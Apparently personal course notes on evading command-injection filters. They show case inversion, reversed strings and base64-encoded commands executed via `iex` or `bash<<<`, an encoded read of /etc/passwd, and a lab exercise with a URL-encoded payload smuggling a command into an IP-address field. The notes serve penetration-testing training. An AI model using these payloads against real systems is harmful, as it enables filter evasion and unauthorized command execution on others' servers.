# Case Manipulation - Try case inversion ```bash WHOAMI ``` - Try case inversion alternation ```powershell # Windows WhOaMi ``` ```bash # Linux because case sensitive $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") $(a="WhOaMi";printf %s "${a,,}") ``` # Reversed Commands ```powershell # Windows "whoami"[-1..-20] -join '' # creacte reverse string iex "$('imaohw'[-1..-20] -join '')" ``` ```bash # Linux because case sensitive echo 'whoami' | rev # create reverse string $(rev<<<'imaohw') ``` # Encoded Commands - First encode the command, then provide a command that decodes the encoded command ```powershell # Windows [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) # encode command iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('<base64_string>')))" ``` ```bash # Linux echo -n 'cat /etc/passwd | grep 33' | base64 # encode command bash<<<$(base64 -d<<<<base64_string>) ``` # Exercise - Submit output of following command `find /usr/share/ | grep root | grep mysql | tail -n 1` - Encode the above command ![[images/Pasted image 20260105205725.png]] - Try to submit command with below payload ```bash 127.0.0.1%0a%09bash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=) ``` ![[images/Pasted image 20260105205757.png]]